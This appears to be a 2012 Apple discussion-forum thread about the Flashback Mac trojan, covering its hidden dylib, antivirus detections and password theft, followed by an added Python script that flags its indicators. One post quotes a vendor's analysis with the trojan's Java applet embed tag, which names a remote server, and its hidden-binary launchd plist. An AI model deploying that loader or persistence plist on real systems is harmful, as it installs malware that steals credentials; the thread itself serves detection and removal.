227 Replies Latest reply: Apr 12, 2012 8:53 PM by MadMacs0
  • X423424X Level 6 Level 6 (14,205 points)

    Thank you for doing that.  Don't have time to look at it right now (on my way out) but I downloaded it to see what I can see later.

  • Bob Mayo Level 1 Level 1 (105 points)

    Is .libgmalloc.dylib a legitimate file that is in some way corrupted by the malware, or is .libgmalloc.dylib itself bad?

    If it is a legitimate file that is corrupted by the malware, how does one restore a proper version of it?

     

    Thanks.

  • fane_j Level 4 Level 4 (3,660 points)

    Bob Mayo wrote:

     

    Is .libgmalloc.dylib a legitimate file

    No.

     

    Basically, any shared code library whose name begins with a dot (.), which renders it invisible in Finder, is unlikely to be legitimate. Note that there are many shared code libraries on your Mac, and there are quite a few files whose names begin with dots (usually containing configuration or registration data). It's the combination of code and dot as first character that makes it highly suspicious and probably not legitimate.

  • X423424X Level 6 Level 6 (14,205 points)

    (post deleted -- somehow didn't notice fane_j gave the answer I was going to give)

  • WZZZ Level 6 Level 6 (12,635 points)

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit (MacKeeper developer) are doing here? From Dr. Web on the BackDoor.Flashback.39 (This was brought up quickly earlier in this thread, but AFAIK never fully explored.)

     

    http://vms.drweb.com/virus/?i=1816029

     

    <object type="application/x-java-applet" width="0" height="0">
      <param name="s" value="1"/>
      <param name="q" value="2"/>
      <param name="svname" value="com.zeobit.keep">
      <param name="svbname" value="mkeeper">
      <param name="dname" value="Software Update">
      <param name="lurl" value="31.31.79.87">');
      <param name="archive" value="al-2.jar">
      <param name="code" value="a.apl">
    </object>

    The exploit saves an executable file to the hard disk, along with a plist file responsible for launching it.

     

    <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
    <plist version="1.0">
    <dict>
      <key>Label</key><string>com.zeobit.keep</string>
      <key>ProgramArguments</key><array><string>/Users/<username>/.mkeeper</string></array>
      <key>RunAtLoad</key><true/>
      <key>StartInterval</key><integer>4212</integer>
      <key>StandardErrorPath</key><string>/dev/null</string>
      <key>StandardOutPath</key><string>/dev/null</string>
    </dict>
    </plist>

    After launching, the trojan checks for the presence of the following components and, if at least one of them is present, terminates its own execution:

  • BoomerangJ111 Level 1 Level 1 (0 points)

    Deleted-incorrect data

  • Topher Kessler Level 6 Level 6 (9,565 points)

    It is not a legitimate file, and should be deleted. By default there is no file of that name or type in the Shared user directory.

  • fane_j Level 4 Level 4 (3,660 points)

     

    WZZZ wrote:

     

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

    " value="com.zeobit.keep">

     

    I can't say for certain, but I'm fairly sure they've nothing to do with it, just like Adobe didn't have anything to do with it. These are just ID strings (which could be any valid string) used by the malware's author to confuse and obfuscate. I suspect that the identifier actually used by MacKeeper is not "com.zeobit.keep" but something else. With the Adobe string the difference was just one character, "com.adobe.reader" instead of "com.adobe.Reader".

     

    Methinks this is the one instance where MacKeeper is not to blame.

  • Topher Kessler Level 6 Level 6 (9,565 points)

    Malware has been known to hijack other application names, as we've seen with Flash in the past. MacKeeper hasn't been known to be malware, though the company behind it has pushed some questionable marketing practices and the product is not the best (it appears crudely coded in order to rake in revenue while providing minimal benefit). Many people recommend folks uninstall or avoid MacKeeper, and the presence of references to it in the latest threats does raise questions, but so far it's not too conclusive.

  • X423424X Level 6 Level 6 (14,205 points)

    WZZZ wrote:

     

    Has anyone determined what mkeeper (MacKeeper) and com.zeobit are doing here

     

    The second one looks identical to the one that started this thread only executing ~/.mkeeper instead of ~/.rserv.

     

    The first one I never saw before.  But there is a reference to some Java code called al-2.jar.

  • MadMacs0 Level 5 Level 5 (4,415 points)

    Marco g wrote:

     

    If anybody is interested, i renamed it to "flserv" uploaded

    Thanks for doing that. It's the first sample I've been able to collect with this variant.

     

    Readers will be happy to know the results of the following scans:

     

    ClamXav identified it as OSX.Flashback-8.

     

    Sophos Home Edition 8 identified it as OSX/Flshplyr-D .

     

    MacScan did not detect anything.

     

    12 of 42 A-V scanners detected it on virustotal.com and the link will take you to the results. Strangely enough it had not been previously uploaded. Positive identification was achieved by avast!, BitDefender, clamav, DrWeb, F-Secure, Kaspersky and Sophos, among others. Users are cautioned that "the service was not designed as a tool to perform antivirus comparative analyses, but as a tool that checks suspicious samples with several antivirus solutions and helps antivirus labs by forwarding them the malware they fail to detect."

  • Matt Durben Level 1 Level 1 (0 points)

    Has anybody been able to detect what this trojan exactly does? Either variant 1 for browsers or variant 2 system/user installation? Some kind of keylogger, or does it spy on passwords that have been saved in Firefox/Safari?

  • MadMacs0 Level 5 Level 5 (4,415 points)

    Matt Durben wrote:

     

    Has anybody been able to detect what this trojan exactly does? Either variant 1 for browsers or variant 2 system/user installation? Some kind of keylogger, or does it spy on passwords that have been saved in Firefox/Safari?

    I'm certain both the Type 1 and Type 2 infections have the same goal, to use your network apps (browsers and Skype have been identified) to accomplish their goals. It has been observed to do re-directs to advertising sites, which I suppose could result in a small amount of compensation from the advertisers, but Intego believe there is a more lucrative goal which I just looked up earlier this evening in a February post Flashback Mac Trojan Horse Infections Increasing with New Variant where they say:

    This malware patches web browsers and network applications essentially to search for user names and passwords. It looks for a number of domains – websites such as Google, Yahoo!, CNN; bank websites; PayPal; and many others. Presumably, the people behind this malware are looking for both user names and passwords that they can immediately exploit – such as for a bank website – as well as others that may be reused on different sites. (Hint: don’t use the same password for all websites!)

    In a subsequent article they figured out that the results of this harvest are sent back to the "Mother Ship" via Twitter, periodically, using a specific hashtag for each date and deleting the messages after they get what they need. The message contains the unique identifier for that user and machine along with the username/password/website information.

  • etresoft Level 7 Level 7 (25,635 points)

    I have created a user tip and malware checker/removal tool: https://discussions.apple.com/docs/DOC-3271

  • dianeoforegon Level 4 Level 4 (3,845 points)

    For Office 2004 users that are infected we are seeing this in their crash logs:

     

    dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib
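An added example, written for this page and not taken from the thread or from any of the posters, that turns the three indicators discussed above into checks a Mac admin could run over collected data: fane_j's rule that a hidden shared library (dot-prefixed name, .dylib extension) is suspect, the LaunchAgent plist quoted from Dr. Web whose ProgramArguments point at a hidden file in a user's home, and the "dyld: could not load inserted library" crash-log line dianeoforegon quoted. All sample data is constructed: the file listing, the plist (with the thread's `<username>` replaced by the placeholder EXAMPLE_USER so the XML parses), and the crash-log excerpt. The contrast path /usr/lib/libgmalloc.dylib is Apple's real Guard Malloc debugging library, included to show that the rule hinges on the leading dot, not on the name.

```python
"""Added example (not from the thread): flag the Flashback artifacts the posts describe.

Three checks, each driven by constructed sample data embedded below:
  1. a hidden shared library (basename starts with '.' and ends in '.dylib')
  2. a launchd plist whose program is a hidden file under /Users/
  3. a 'dyld: could not load inserted library' crash-log line, which exposes the
     path a DYLD_INSERT_LIBRARIES entry pointed at after the library went missing
"""
import plistlib
import posixpath
import re

# Constructed file listing standing in for /Users/Shared, /usr/lib and a home dir.
SAMPLE_PATHS = [
    "/Users/Shared/.libgmalloc.dylib",    # hidden dylib: suspicious
    "/Users/Shared/Relocated Items",
    "/usr/lib/libgmalloc.dylib",          # Apple's real Guard Malloc library: not hidden
    "/Users/EXAMPLE_USER/.bash_profile",  # hidden, but configuration, not code
]

# Constructed plist modelled on the one quoted from Dr. Web; '<username>' in the
# quoted text is replaced with the placeholder EXAMPLE_USER so the XML parses.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0"><dict>
<key>Label</key><string>com.zeobit.keep</string>
<key>ProgramArguments</key><array><string>/Users/EXAMPLE_USER/.mkeeper</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>4212</integer>
<key>StandardErrorPath</key><string>/dev/null</string>
<key>StandardOutPath</key><string>/dev/null</string>
</dict></plist>"""

# Constructed crash-log excerpt containing the line quoted in the thread.
SAMPLE_CRASH_LOG = """Process: Microsoft Word [1234]
dyld: could not load inserted library: /User/Shared/.libgmalloc.dylib
Exception Type: EXC_BREAKPOINT (SIGTRAP)"""


def hidden_dylibs(paths):
    """Return paths whose basename starts with '.' and ends with '.dylib'."""
    return [p for p in paths
            if posixpath.basename(p).startswith(".") and p.endswith(".dylib")]


def hidden_program_launchers(plist_bytes):
    """Return [(label, program)] for a launchd plist whose program (first
    ProgramArguments entry, else Program) is a hidden file under /Users/;
    return [] when the plist does not match."""
    data = plistlib.loads(plist_bytes)
    args = data.get("ProgramArguments") or []
    program = args[0] if args else data.get("Program", "")
    if program.startswith("/Users/") and posixpath.basename(program).startswith("."):
        return [(data.get("Label", ""), program)]
    return []


DYLD_RE = re.compile(r"^dyld: could not load inserted library: (?P<path>.+)$")


def inserted_library_paths(log_text):
    """Extract library paths from 'dyld: could not load inserted library' lines."""
    found = []
    for line in log_text.splitlines():
        m = DYLD_RE.match(line.strip())
        if m:
            found.append(m.group("path").strip())
    return found


if __name__ == "__main__":
    for p in hidden_dylibs(SAMPLE_PATHS):
        print("hidden shared library:", p)
    for label, prog in hidden_program_launchers(SAMPLE_PLIST):
        print("launchd job", label, "runs hidden file", prog)
    for p in inserted_library_paths(SAMPLE_CRASH_LOG):
        print("dyld tried to insert:", p)
```

On a real machine the inputs would come from a directory walk of /Users/Shared and each home directory, from the plists in ~/Library/LaunchAgents, and from the crash reports under ~/Library/Logs; the checks themselves only read data, so they are safe to run on a suspected machine before deciding what to remove.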